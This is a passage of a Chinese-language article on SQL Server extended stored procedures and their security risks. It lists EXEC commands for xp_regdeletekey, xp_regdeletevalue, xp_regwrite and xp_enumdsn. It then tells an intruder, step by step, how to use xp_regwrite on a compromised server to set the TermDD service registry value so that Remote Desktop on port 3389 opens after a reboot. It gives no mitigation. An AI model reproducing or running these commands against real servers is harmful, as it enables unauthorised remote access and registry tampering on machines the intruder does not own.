中存储过程的安全问题呢

太多也不会被显示的。 xp_regdeletekey (这个扩展存储过程可以删除注册表指定的键，使用时要谨慎)，使用方法(从注册表里删除HKEY_LOCAL_MACHINE\\SOFTWARE\\aaa)： EXEC master..xp_regdeletekey @rootkey=\'HKEY_LOCAL_MACHINE\', @key=\'SOFTWARE\\aaa\' xp_regdeletevalue(这个扩展存储过程可以删除注册表指定的键里指定的值)，使用方法(要删除键值HKEY_LOCAL_MACHINE\\SOFTWARE\\aaa\\aaaValue)： EXEC master..xp_regdeletevalue @rootkey=\'HKEY_LOCAL_MACHINE\', @key=\'SOFTWARE\\aaa\', @value_name=\'aaaValue\' xp_regwrite(这个扩展存储过程可以写入注册表指定的键里指定的值)，使用方法(在键HKEY_LOCAL_MACHINE\\SOFTWARE\\aaa\\aaaValue写入bbb)： EXEC master..xp_regwrite @rootkey=\'HKEY_LOCAL_MACHINE\', @key=\'SOFTWARE\\aaa\', @value_name=\'aaaValue\', @type=\'REG_SZ\', @value=\'bbb\' xp_enumdsn(这个扩展存储过程可以得到ODBC中的用户数据源)，使用方法： EXEC master..xp_enumdsn 有了上面这些操作注册表的扩展存储过程，入侵者就可以做很多事情了，如果被入侵机器的3389没有被打开，入侵者就可以向被入侵机器的注册表里写入开3389的键值，只要等被入侵机器重新启动后，入侵者就可以连接3389端口了，具体要写哪些键值，上有很多介绍，大家可以找一下，需要注意的是在查询分析器里运行xp_regwrite存储过程时(注意一条一条运行)，按照下面这种简单的形式运行： xp_regwrite \'HKEY_LOCAL_MACHINE\',\'SYSTEM\\CurrentControlSet\\Services\\TermDD\',\'start\',\'reg_dword\',2 等被入侵机器重新启动后，就可以连接3389端口了。